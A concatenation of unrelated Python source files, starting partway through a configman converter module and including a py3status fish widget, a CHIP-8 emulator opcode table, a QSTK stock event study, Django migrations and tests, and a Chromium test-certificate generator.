        Option(**{u'foo':1, u'bar':2, 3:4})

    Then you don't want to change that {3:4} part which becomes part of
    `**kwargs` inside the __init__ method.
    Using integers as parameter keys is a silly example but the point is that
    due to the python 2.6.4 bug only unicode keys are converted to str.
    """
    new_dict = {}
    for key in a_dict:
        if isinstance(key, unicode):
            new_dict[str(key)] = a_dict[key]
        else:
            new_dict[key] = a_dict[key]
    return new_dict


#------------------------------------------------------------------------------
def io_converter(input_str):
    """ a conversion function for to select stdout, stderr or open a file for
    writing"""
    if type(input_str) is str:
        input_str_lower = input_str.lower()
        if input_str_lower == 'stdout':
            return sys.stdout
        if input_str_lower == 'stderr':
            return sys.stderr
        return open(input_str, "w")
    return input_str


#------------------------------------------------------------------------------
def timedelta_converter(input_str):
    """a conversion function for time deltas"""
    if isinstance(input_str, basestring):
        days, hours, minutes, seconds = 0, 0, 0, 0
        details = input_str.split(':')
        if len(details) >= 4:
            days = int(details[-4])
        if len(details) >= 3:
            hours = int(details[-3])
        if len(details) >= 2:
            minutes = int(details[-2])
        if len(details) >= 1:
            seconds = int(details[-1])
        return datetime.timedelta(days=days,
                                      hours=hours,
                                      minutes=minutes,
                                      seconds=seconds)
    raise ValueError(input_str)


#------------------------------------------------------------------------------
def boolean_converter(input_str):
    """ a conversion function for boolean
    """
    return input_str.lower() in ("true", "t", "1", "y", "yes")


#------------------------------------------------------------------------------
import __builtin__
_all_named_builtins = dir(__builtin__)


def class_converter(input_str):
    """ a conversion that will import a module and class name
    """
    if not input_str:
        return None
    if '.' not in input_str and input_str in _all_named_builtins:
        return eval(input_str)
    parts = [x.strip() for x in input_str.split('.') if x.strip()]
    try:
        # first try as a complete module
        package = __import__(input_str)
    except ImportError:
        # it must be a class from a module
        if len(parts) == 1:
            # since it has only one part, it must be a class from __main__
            parts = ('__main__', input_str)
        package = __import__('.'.join(parts[:-1]), globals(), locals(), [])
    obj = package
    for name in parts[1:]:
        obj = getattr(obj, name)
    return obj


#------------------------------------------------------------------------------
def classes_in_namespaces_converter(template_for_namespace="cls%d",
                                    name_of_class_option='cls',
                                    instantiate_classes=False):
    """take a comma delimited  list of class names, convert each class name
    into an actual class as an option within a numbered namespace.  This
    function creates a closure over a new function.  That new function,
    in turn creates a class derived from RequiredConfig.  The inner function,
    'class_list_converter', populates the InnerClassList with a Namespace for
    each of the classes in the class list.  In addition, it puts the each class
    itself into the subordinate Namespace.  The requirement discovery mechanism
    of configman then reads the InnerClassList's requried config, pulling in
    the namespaces and associated classes within.

    For example, if we have a class list like this: "Alpha, Beta", then this
    converter will add the following Namespaces and options to the
    configuration:

        "cls0" - the subordinate Namespace for Alpha
        "cls0.cls" - the option containing the class Alpha itself
        "cls1" - the subordinate Namespace for Beta
        "cls1.cls" - the option containing the class Beta itself

    Optionally, the 'class_list_converter' inner function can embue the
    InnerClassList's subordinate namespaces with aggregates that will
    instantiate classes from the class list.  This is a convenience to the
    programmer who would otherwise have to know ahead of time what the
    namespace names were so that the classes could be instantiated within the
    context of the correct namespace.  Remember the user could completely
    change the list of classes at run time, so prediction could be difficult.

        "cls0" - the subordinate Namespace for Alpha
        "cls0.cls" - the option containing the class Alpha itself
        "cls0.cls_instance" - an instance of the class Alpha
        "cls1" - the subordinate Namespace for Beta
        "cls1.cls" - the option containing the class Beta itself
        "cls1.cls_instance" - an instance of the class Beta

    parameters:
        template_for_namespace - a template for the names of the namespaces
                                 that will contain the classes and their
                                 associated required config options.  The
                                 namespaces will be numbered sequentially.  By
                                 default, they will be "cls1", "cls2", etc.
        class_option_name - the name to be used for the class option within
                            the nested namespace.  By default, it will choose:
                            "cls1.cls", "cls2.cls", etc.
        instantiate_classes - a boolean to determine if there should be an
                              aggregator added to each namespace that
                              instantiates each class.  If True, then each
                              Namespace will contain elements for the class, as
                              well as an aggregator that will instantiate the
                              class.
                              """

    #--------------------------------------------------------------------------
    def class_list_converter(class_list_str):
        """This function becomes the actual converter used by configman to
        take a string and convert it into the nested sequence of Namespaces,
        one for each class in the list.  It does this by creating a proxy
        class stuffed with its own 'required_config' that's dynamically
        generated."""
        if isinstance(class_list_str, basestring):
            class_list = [x.strip() for x in class_list_str.split(',')]
        else:
            raise TypeError('must be derivative of a basestring')

        #======================================================================
        class InnerClassList(RequiredConfig):
            """This nested class is a proxy list for the classes.  It collects
            all the config requirements for the listed classes and places them
            each into their own Namespace.
            """
            # we're dynamically creating a class here.  The following block of
            # code is actually adding class level attributes to this new class
            required_config = Namespace()  # 1st requirement for configman
            subordinate_namespace_names = []  # to help the programmer know
                                              # what Namespaces we added
            namespace_template = template_for_namespace  # save the template
                                                         # for future reference
            class_option_name = name_of_class_option  # save the class's option
                                                      # name for the future
            # for each class in the class list
            for namespace_index, a_class in enumerate(class_list):
                # figure out the Namespace name
                namespace_name = template_for_namespace % namespace_index
                subordinate_namespace_names.append(namespace_name)
                # create the new Namespace
                required_config[namespace_name] = Namespace()
                # add the option for the class itself
                required_config[namespace_name].add_option(
                  name_of_class_option,
                  #doc=a_class.__doc__  # not helpful if too verbose
                  default=a_class,
                  from_string_converter=class_converter
                )
                if instantiate_classes:
                    # add an aggregator to instantiate the class
                    required_config[namespace_name].add_aggregation(
                      "%s_instance" % name_of_class_option,
                      lambda c, lc, a: lc[name_of_class_option](lc))

            @classmethod
            def to_str(cls):
                """this method takes this inner class object and turns it back
                into the original string of classnames.  This is used
                primarily as for the output of the 'help' option"""
                return ', '.join(
                    py_obj_to_str(v[name_of_class_option].value)
                        for v in cls.get_required_config().values()
                        if isinstance(v, Namespace))

        return InnerClassList  # result of class_list_converter
    return class_list_converter  # result of classes_in_namespaces_converter


#------------------------------------------------------------------------------
def regex_converter(input_str):
    return re.compile(input_str)

compiled_regexp_type = type(re.compile(r'x'))

#------------------------------------------------------------------------------
from_string_converters = {
    int: int,
    float: float,
    str: str,
    unicode: unicode,
    bool: boolean_converter,
    dict: json.loads,
    datetime.datetime: datetime_converter,
    datetime.date: date_converter,
    datetime.timedelta: timedelta_converter,
    type: class_converter,
    types.FunctionType: class_converter,
    compiled_regexp_type: regex_converter,
}


#------------------------------------------------------------------------------
def py_obj_to_str(a_thing):
    if a_thing is None:
        return ''
    if inspect.ismodule(a_thing):
        return a_thing.__name__
    if a_thing.__module__ == '__builtin__':
        return a_thing.__name__
    if a_thing.__module__ == "__main__":
        return a_thing.__name__
    if hasattr(a_thing, 'to_str'):
        return a_thing.to_str()
    return "%s.%s" % (a_thing.__module__, a_thing.__name__)


#------------------------------------------------------------------------------
def list_to_str(a_list):
    return ', '.join(to_string_converters[type(x)](x) for x in a_list)

#------------------------------------------------------------------------------
to_string_converters = {
    int: str,
    float: str,
    str: str,
    unicode: unicode,
    list: list_to_str,
    tuple: list_to_str,
    bool: lambda x: 'True' if x else 'False',
    dict: json.dumps,
    datetime.datetime: datetime_util.datetime_to_ISO_string,
    datetime.date: datetime_util.date_to_ISO_string,
    datetime.timedelta: datetime_util.timedelta_to_str,
    type: py_obj_to_str,
    types.ModuleType: py_obj_to_str,
    types.FunctionType: py_obj_to_str,
    compiled_regexp_type: lambda x: x.pattern,
}


#------------------------------------------------------------------------------
#converters_requiring_quotes = [eval, eval_to_regex_converter]
converters_requiring_quotes = [eval, regex_converter]

###
# Copyright (c) 2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#   * Redistributions of source code must retain the above copyright notice,
#     this list of conditions, and the following disclaimer.
#   * Redistributions in binary form must reproduce the above copyright notice,
#     this list of conditions, and the following disclaimer in the
#     documentation and/or other materials provided with the distribution.
#   * Neither the name of the author of this software nor the name of
#     contributors to this software may be used to endorse or promote products
#     derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###

from supybot.test import *

class MyChannelLoggerTestCase(PluginTestCase):
    plugins = ('MyChannelLogger',)


# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:

#!/usr/bin/env python

import sys

def inv(s):
  if s[0] == '-':
    return s[1:]
  elif s[0] == '+':
    return '-' + s[1:]
  else: # plain number
    return '-' + s

if len(sys.argv) != 1:
  print 'Usage:', sys.argv[0]
  sys.exit(1)

for line in sys.stdin:
  linesplit = line.strip().split()
  if len(linesplit) == 3:
    assert(linesplit[0] == 'p')
    print('p ' + inv(linesplit[2]) + ' ' + linesplit[1])
  elif len(linesplit) == 5:
    assert(linesplit[0] == 's')
    print('s ' + \
          inv(linesplit[2]) + ' ' + linesplit[1] + ' ' + \
          inv(linesplit[4]) + ' ' + linesplit[3] )
  elif len(linesplit) == 0:
    print

def test_default(cookies):
    """
    Checks if default configuration is working
    """
    result = cookies.bake()

    assert result.exit_code == 0
    assert result.project.isdir()
    assert result.exception is None

#!/usr/bin/env python
# -*- mode: python; sh-basic-offset: 4; indent-tabs-mode: nil; coding: utf-8 -*-
# vim: tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8
#
# Shell command
# Copyright 2010, Jeremy Grosser <synack@digg.com>

import argparse
import os
import sys

import clusto
from clusto import script_helper


class Console(script_helper.Script):
    '''
    Use clusto's hardware port mappings to console to a remote server
    using the serial console.
    '''

    def __init__(self):
        script_helper.Script.__init__(self)

    def _add_arguments(self, parser):
        user = os.environ.get('USER')
        parser.add_argument('--user', '-u', default=user,
            help='SSH User (you can also set this in clusto.conf too'
                 'in console.user: --user > clusto.conf:console.user > "%s")' % user)
        parser.add_argument('server', nargs=1,
            help='Object to console to (IP or name)')

    def add_subparser(self, subparsers):
        parser = self._setup_subparser(subparsers)
        self._add_arguments(parser)

    def run(self, args):
        try:
            server = clusto.get(args.server[0])
            if not server:
                raise LookupError('Object "%s" does not exist' % args.server)
        except Exception as e:
            self.debug(e)
            self.error('No object like "%s" was found' % args.server)
            return 1
        server = server[0]

        if not hasattr(server, 'console'):
            self.error('The object %s lacks a console method' % server.name)
            return 2

        user = os.environ.get('USER')
        if args.user:
            self.debug('Grabbing user from parameter')
            user = args.user
        else:
            self.debug('Grabbing user from config file or default')
            user = self.get_conf('console.user', user)
        self.debug('User is "%s"' % user)
        return(server.console(ssh_user=user))


def main():
    console, args = script_helper.init_arguments(Console)
    return(console.run(args))

if __name__ == '__main__':
    sys.exit(main())


from unittest import TestCase

from django.core.management import call_command


class SendAiPicsStatsTestCase(TestCase):
    def test_run_command(self):
        call_command('send_ai_pics_stats')

# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder.  You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg

from m5.objects import *
from arm_generic import *
import switcheroo

root = LinuxArmFSSwitcheroo(
    mem_class=DDR3_1600_x64,
    cpu_classes=(AtomicSimpleCPU, AtomicSimpleCPU)
    ).create_root()

# Setup a custom test method that uses the switcheroo tester that
# switches between CPU models.
run_test = switcheroo.run_test

# -*- coding: utf-8 -*-
"""
Display a fortune-telling, swimming fish.

Wanda has no use what-so-ever. It only takes up disk space and compilation time,
and if loaded, it also takes up precious bar space, memory, and cpu cycles.
Anybody found using it should be promptly sent for a psychiatric evaluation.

Configuration parameters:
    cache_timeout: refresh interval for this module (default 0)
    format: display format for this module
        (default '{nomotion}[{fortune} ]{wanda}{motion}')
    fortune_timeout: refresh interval for fortune (default 60)

Format placeholders:
    {fortune} one of many aphorisms or vague prophecies
    {wanda} name of one of the most commonly kept freshwater aquarium fish
    {motion} biologically propelled motion through a liquid medium
    {nomotion} opposite behavior of motion to prevent modules from shifting

Optional:
    fortune-mod: the fortune cookie program from bsd games

Examples:
```
# disable motions when not in use
wanda_the_fish {
    format = '[\?if=fortune {nomotion}][{fortune} ]'
    format += '{wanda}[\?if=fortune {motion}]'
}

# no updates, no motions, yes fortunes, you click
wanda_the_fish {
    format = '[{fortune} ]{wanda}'
    cache_timeout = -1
}

# wanda moves, fortunes stays
wanda_the_fish {
    format = '[{fortune} ]{nomotion}{wanda}{motion}'
}

# wanda is swimming too fast, slow down wanda
wanda_the_fish {
    cache_timeout = 2
}
```

@author lasers

SAMPLE OUTPUT
[
    {'full_text': 'innovate, v.: To annoy people.'},
    {'full_text': ' <', 'color': '#ffa500'},
    {'full_text': '\xba', 'color': '#add8e6'},
    {'full_text': ',', 'color': '#ff8c00'},
    {'full_text': '))', 'color': '#ffa500'},
    {'full_text': '))>< ', 'color': '#ff8c00'},
]

idle
[
    {'full_text': ' <', 'color': '#ffa500'},
    {'full_text': '\xba', 'color': '#add8e6'},
    {'full_text': ',', 'color': '#ff8c00'},
    {'full_text': '))', 'color': '#ffa500'},
    {'full_text': '))>3', 'color': '#ff8c00'},
]

py3status
[
    {'full_text': 'py3status is so cool!'},
    {'full_text': ' <', 'color': '#ffa500'},
    {'full_text': '\xba', 'color': '#add8e6'},
    {'full_text': ',', 'color': '#ff8c00'},
    {'full_text': '))', 'color': '#ffa500'},
    {'full_text': '))>< ', 'color': '#ff8c00'},
]
"""

from time import time


class Py3status:
    """
    """

    # available configuration parameters
    cache_timeout = 0
    format = "{nomotion}[{fortune} ]{wanda}{motion}"
    fortune_timeout = 60

    def post_config_hook(self):
        body = (
            "[\?color=orange&show <"
            "[\?color=lightblue&show º]"
            "[\?color=darkorange&show ,]))"
            "[\?color=darkorange&show ))>%s]]"
        )
        wanda = [body % fin for fin in ("<", ">", "<", "3")]
        self.wanda = [self.py3.safe_format(x) for x in wanda]
        self.wanda_length = len(self.wanda)
        self.index = 0

        self.fortune_command = ["fortune", "-as"]
        self.fortune = self.py3.storage_get("fortune") or None
        self.toggled = self.py3.storage_get("toggled") or False
        self.motions = {"motion": " ", "nomotion": ""}

        # deal with {new,old} timeout between storage
        fortune_timeout = self.py3.storage_get("fortune_timeout")
        timeout = None
        if self.fortune_timeout != fortune_timeout:
            timeout = time() + self.fortune_timeout
        self.time = (
            timeout or self.py3.storage_get("time") or (time() + self.fortune_timeout)
        )

    def _set_fortune(self, state=None, new=False):
        if not self.fortune_command:
            return
        if new:
            try:
                fortune_data = self.py3.command_output(self.fortune_command)
            except self.py3.CommandError:
                self.fortune = ""
                self.fortune_command = None
            else:
                self.fortune = " ".join(fortune_data.split())
                self.time = time() + self.fortune_timeout
        elif state is None:
            if self.toggled and time() >= self.time:
                self._set_fortune(new=True)
        else:
            self.toggled = state
            if state:
                self._set_fortune(new=True)
            else:
                self.fortune = None

    def _set_motion(self):
        for k in self.motions:
            self.motions[k] = "" if self.motions[k] else " "

    def _set_wanda(self):
        self.index += 1
        if self.index >= self.wanda_length:
            self.index = 0

    def wanda_the_fish(self):
        self._set_fortune()
        self._set_motion()
        self._set_wanda()

        return {
            "cached_until": self.py3.time_in(self.cache_timeout),
            "full_text": self.py3.safe_format(
                self.format,
                {
                    "fortune": self.fortune,
                    "motion": self.motions["motion"],
                    "nomotion": self.motions["nomotion"],
                    "wanda": self.wanda[self.index],
                },
            ),
        }

    def kill(self):
        self.py3.storage_set("toggled", self.toggled)
        self.py3.storage_set("fortune", self.fortune)
        self.py3.storage_set("fortune_timeout", self.fortune_timeout)
        self.py3.storage_set("time", self.time)

    def on_click(self, event):
        if not self.fortune_command:
            return
        self._set_fortune(not self.toggled)


if __name__ == "__main__":
    """
    Run module in test mode.
    """
    from py3status.module_test import module_test

    module_test(Py3status)

# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-05 14:25
from __future__ import unicode_literals

from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [("elections", "0049_move_status")]

    operations = [
        migrations.RemoveField(model_name="election", name="rejection_reason"),
        migrations.RemoveField(model_name="election", name="suggested_status"),
        migrations.RemoveField(model_name="election", name="suggestion_reason"),
    ]

from __future__ import print_function
import re

import logging

logging.basicConfig(level=logging.INFO)

class Executor(object):

    def __init__(self, op_map):
        processed = {}
        for pattern, f in op_map.iteritems():
            s = self._build_pattern_groups(pattern.lower())
            processed[re.compile(s)] = f

        self.operations = processed

    def execute(self, context, op):
        s = "%04x" % op
        for pattern, f in self.operations.iteritems():
            m = pattern.match(s)
            if m:
                return f(context, *[int(v, base=16) for v in m.groups()])
        assert False, s

    def _build_pattern_groups(self, pattern):
        s = pattern.replace('?', '.')
        for id in ['x', 'y', 'z']:
            m = re.search('%s+' % id, s)
            if m:
                s = s[:m.start()] + ('(.{%s})' % (m.end() - m.start())) + s[m.end():] 
        return '^' + s + '$'

def set_mem_v0_vx(context, x):
    for i in range(x):
        context.memory.write_byte(context.index_reg + i, context.v[i])
    context.pc += 2
    
def fill_v0_vx(context, x):
    for i in range(x+1):
        context.v[i] = context.memory.get_byte(context.index_reg + i)
    context.pc += 2
    
def set_bcd_vx(context, x):
    val = int(context.v[x])
    context.memory.write_byte(context.index_reg, val / 100)
    context.memory.write_byte(context.index_reg + 1, val % 100 / 10)
    context.memory.write_byte(context.index_reg + 2, val % 100 % 10)
    context.pc += 2
        
def set_i_font(context, x):
    context.index_reg = context.memory.get_font_address(context.v[x])
    context.pc += 2
    
def add_reg_ind(context, x):
    context.index_reg += context.v[x]
    context.pc += 2
        
def set_delay_timer(context, x):
    context.delay_timer = context.v[x]
    context.pc += 2

def set_sound_timer(context, x):
    context.sound_timer = context.v[x]
    context.pc += 2
    
def set_vx_key_pressed(context, x):
    context.v[x] = context.keypad.wait_for_keypress()
    context.pc += 2

def set_vx_delay_timer(context, x):
    context.v[x] = context.delay_timer
    context.pc += 2
    
def skip_key_vx(context, x, result=True):
    if context.keypad.is_keypressed(context.v[x]) == result:
        context.pc += 2
    context.pc += 2
    
def draw_sprite(context, x, y, n):
    sprite = []
    for cb in range(n):
        sprite.append(context.memory.get_byte(context.index_reg + cb))
    collision = context.screen.draw(context.v[x], context.v[y], sprite)
    context.v[15] = collision
    context.pc += 2
            
def jump_nnn_v0(context, nnn):
    context.pc = context.v[0] + nnn

def set_vx_rand(context, x, nn):
    import random
    context.v[x] = random.randint(0, 0xFF) & nn
    context.pc += 2
    
def jump_noteq(context, x, y):
    if context.v[x] != context.v[y]:
        context.pc += 2
    context.pc += 2
    
def shift_vy_left(context, x, y):
    context.v[15] = context.v[15] >> 7 # First value
    context.v[x] = (context.v[y] << 1) % 255
    context.pc += 2

def shift_right(context, x, y):
    context.v[15] = context.v[y] & 0x1
    context.v[x] = context.v[y] >> 1
    context.pc += 2

def sub_vx_vy_vf(context, x, y):
    logging.info('Setting V[X] = V[X] - V[Y], V[F] = 1 if V[Y] > V[X]')
    context.v[15] = 1 if context.v[y] > context.v[x] else 0
    context.v[x] = context.v[x] - context.v[y]
    context.pc += 2
    
def add_vx_vy(context, x, y):
    logging.info('Setting V[X] = V[X] + V[Y]')
    val = context.v[x] + context.v[y]
    context.v[15] = 1 if val > 255 else 0
    context.v[x] = val % 256
    context.pc += 2

def sub_vx_vy(context, x, y):
    logging.info('Setting V[X] = V[X] - V[Y]')
    val = context.v[x] - context.v[y]
    context.v[15] = 1 if val < 0 else 0
    context.v[x] = val % 256
    context.pc += 2
    
def set_vx_or_vy(context, x, y):
    logging.info('Setting V[X] = V[X] | V[Y]')
    context.v[x] = context.v[x] | context.v[y]
    context.pc += 2
    
def set_vx_xor_vy(context, x, y):
    logging.info('Setting V[X] = V[X] ^ V[Y]')
    context.v[x] = context.v[x] ^ context.v[y]
    context.pc += 2

def set_vx_and_vy(context, x, y):
    logging.info('Setting V[X] = V[X] & V[Y]')
    context.v[x] = context.v[x] & context.v[y]
    context.pc += 2

def set_vx_vy(context, x, y):
    logging.info('Setting V[X] = V[Y]')
    context.v[x] = context.v[y]
    context.pc += 2
    
def add_reg(context, x, nnn):
    logging.info('Adding NNN to V[X]')
    context.v[x] = (context.v[x] + nnn) % 256
    context.pc += 2

def set_i(context, nnn):
    logging.info('Setting NNN to index_reg')
    context.index_reg = nnn
    context.pc += 2

def pop_stack(context):
    logging.info('Returning from a subroutine')
    context.pc = context.stack.pop()

def call_rca1082(context, address): #TODO
    print("operation not implemented yet:", address)
    context.pc += 1 

def clear(context):
    logging.info('Clearing screen')
    context.screen.clear()
    context.pc += 2

def jump(context, address):
    logging.info('Jump at 0x%2x address' % address)
    context.pc = address

def call(context, address):
    logging.info('Calling subroutine at 0x%2x address' % address)
    context.pc += 2
    context.stack.append(context.pc)
    context.pc = address

def skip_equal(context, x, nnn, ifeq=True):
    logging.info('Skip if V[X] === NNN is %s' % ifeq)
    if (context.v[x] == nnn) == ifeq:
        context.pc += 2
    context.pc += 2

def skip_eq_reg(context, x, y):
    logging.info('Skip if V[X] === V[Y]')
    if context.v[x] == context.v[y]:
        context.pc += 2
    context.pc += 2

def set_reg(context, x, nnn):
    logging.info('Set NNN to cpu reg V[x]')
    context.v[x] = nnn
    context.pc += 2

op_map = {
    '0?E0': clear,
    '0?EE': pop_stack,
    '0XXX': call_rca1082,
    '1XXX': jump,
    '2XXX': call,
    '3XYY': skip_equal,
    '4XYY': lambda context, x, nn: skip_equal(context, x, nn, ifeq = False),
    '5XY0': skip_eq_reg,
    '6XYY': set_reg,
    '7XYY': add_reg,
    '8XY0': set_vx_vy,
    '8XY1': set_vx_or_vy,
    '8XY2': set_vx_and_vy,
    '8XY3': set_vx_xor_vy,
    '8XY4': add_vx_vy,
    '8XY5': sub_vx_vy,
    '8XY6': shift_right,
    '8XY7': sub_vx_vy_vf,
    '8XYE': shift_vy_left,
    '9XY0': jump_noteq,
    'AXXX': set_i,
    'BXXX': jump_nnn_v0,
    'CXYY': set_vx_rand,
    'DXYZ': draw_sprite,
    'EX9E': lambda context, x: skip_key_vx(x, result=False),
    'EXA1': skip_key_vx,
    'FX07': set_vx_delay_timer,
    'FX0A': set_vx_key_pressed,
    'FX15': set_delay_timer,
    'FX18': set_sound_timer,
    'FX1E': add_reg_ind,
    'FX29': set_i_font,
    'FX33': set_bcd_vx,
    'FX55': set_mem_v0_vx,
    'FX65': fill_v0_vx
}



# -*- coding: utf-8 -*-
"""
Created on Thu Jan 03 10:16:39 2013

@author: Grahesh
"""

import pandas 
from qstkutil import DataAccess as da
import numpy as np
import math
import copy
import qstkutil.qsdateutil as du
import datetime as dt
import qstkutil.DataAccess as da
import qstkutil.tsutil as tsu
import qstkstudy.EventProfiler as ep

"""
Accepts a list of symbols along with start and end date
Returns the Event Matrix which is a pandas Datamatrix
Event matrix has the following structure :
    |IBM |GOOG|XOM |MSFT| GS | JP |
(d1)|nan |nan | 1  |nan |nan | 1  |
(d2)|nan | 1  |nan |nan |nan |nan |
(d3)| 1  |nan | 1  |nan | 1  |nan |
(d4)|nan |  1 |nan | 1  |nan |nan |
...................................
...................................
Also, d1 = start date
nan = no information about any event.
1 = status bit(positively confirms the event occurence)
"""

# Get the data from the data store
storename = "NSEData" # get data from our daily prices source
# Available field names: open, close, high, low, close, actual_close, volume
closefield = "close"
volumefield = "volume"
window = 10

def getHalfYearEndDates(timestamps):
        newTS=[]
        tempYear=timestamps[0].year
        flag=1
        
        for x in range(0, len(timestamps)-1):
            if(timestamps[x].year==tempYear):
                if(timestamps[x].month==4 and flag==1):
                    newTS.append(timestamps[x-1])
                    flag=0
                if(timestamps[x].month==10):
                    newTS.append(timestamps[x-1])
                    tempYear=timestamps[x].year+1
                    flag=1
        
        return newTS
        

def findEvents(symbols, startday,endday, marketSymbol,verbose=False):

        # Reading the Data for the list of Symbols.     
        timeofday=dt.timedelta(hours=16)
        timestamps = du.getNSEdays(startday,endday,timeofday)

        endOfHalfYear=getHalfYearEndDates(timestamps)
        
     
        dataobj = da.DataAccess('NSEData')
        if verbose:
            print __name__ + " reading data"
        # Reading the Data
        
        close = dataobj.get_data(timestamps, symbols, closefield)

        # Completing the Data - Removing the NaN values from the Matrix
        close = (close.fillna(method='ffill')).fillna(method='backfill')

        
        # Calculating Daily Returns for the Market
        tsu.returnize0(close.values)


        # Calculating the Returns of the Stock Relative to the Market 
        # So if a Stock went up 5% and the Market rised 3%. The the return relative to market is 2% 
        mktneutDM = close - close[marketSymbol]

        np_eventmat = copy.deepcopy(mktneutDM)

        for sym in symbols:
                for time in timestamps:

                        np_eventmat[sym][time]=np.NAN

        
        
        if verbose:
            print __name__ + " finding events"

        # Generating the Event Matrix
        # Event described is : Analyzing half year events for given stocks.

        for symbol in symbols:
                for i in endOfHalfYear:                    

                        np_eventmat[symbol][i] = 1.0  #overwriting by the bit, marking the event
     
                        
        return np_eventmat


#################################################
################ MAIN CODE ######################
#################################################


symbols = np.loadtxt('NSE500port.csv',dtype='S13',comments='#', skiprows=1)
# You might get a message about some files being missing, don't worry about it.

#symbols =['SPY','BFRE','ATCS','RSERF','GDNEF','LAST','ATTUF','JBFCF','CYVA','SPF','XPO','EHECF','TEMO','AOLS','CSNT','REMI','GLRP','AIFLY','BEE','DJRT','CHSTF','AICAF']
#symbols=['NSE','3MINDIA.NS','AARTIIND.NS','ABAN.NS','ABB.NS','ABGSHIP.NS','ABIRLANUV.NS','ACC.NS','ADANIENT.NS','ADANIPORT.NS','ADANIPOWE.NS','ADVANTA.NS','ALLCARGO.NS','AIAENG.NS','AIL.NS','AZKOINDIA.NS']


startday = dt.datetime(2011,1,1)
endday = dt.datetime(2012,1,1)
eventMatrix = findEvents(symbols,startday,endday,marketSymbol='NSE500',verbose=True)

eventMatrix.to_csv('eventmatrix.csv', sep=',')

eventProfiler = ep.EventProfiler(eventMatrix,startday,endday,lookback_days=20,lookforward_days=20,verbose=True)

eventProfiler.study(filename="HalfYearEventStudy.jpg",plotErrorBars=True,plotMarketNeutral=True,plotEvents=False,marketSymbol='NSE500')



#!/usr/bin/python
# Copyright (c) 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""
A chain with four possible intermediates with different notBefore and notAfter
dates, for testing path bulding prioritization.
"""

import sys
sys.path += ['../..']

import gencerts

DATE_A = '150101120000Z'
DATE_B = '150102120000Z'
DATE_C = '180101120000Z'
DATE_D = '180102120000Z'


root = gencerts.create_self_signed_root_certificate('Root')
root.set_validity_range(DATE_A, DATE_D)

int_ac = gencerts.create_intermediate_certificate('Intermediate', root)
int_ac.set_validity_range(DATE_A, DATE_C)

int_ad = gencerts.create_intermediate_certificate('Intermediate', root)
int_ad.set_validity_range(DATE_A, DATE_D)
int_ad.set_key(int_ac.get_key())

int_bc = gencerts.create_intermediate_certificate('Intermediate', root)
int_bc.set_validity_range(DATE_B, DATE_C)
int_bc.set_key(int_ac.get_key())

int_bd = gencerts.create_intermediate_certificate('Intermediate', root)
int_bd.set_validity_range(DATE_B, DATE_D)
int_bd.set_key(int_ac.get_key())

target = gencerts.create_end_entity_certificate('Target', int_ac)
target.set_validity_range(DATE_A, DATE_D)


gencerts.write_chain('The root', [root], out_pem='root.pem')
gencerts.write_chain('Intermediate with validity range A..C',
                     [int_ac], out_pem='int_ac.pem')
gencerts.write_chain('Intermediate with validity range A..D',
                     [int_ad], out_pem='int_ad.pem')
gencerts.write_chain('Intermediate with validity range B..C',
                     [int_bc], out_pem='int_bc.pem')
gencerts.write_chain('Intermediate with validity range B..D',
                     [int_bd], out_pem='int_bd.pem')
gencerts.write_chain('The target', [target], out_pem='target.pem')


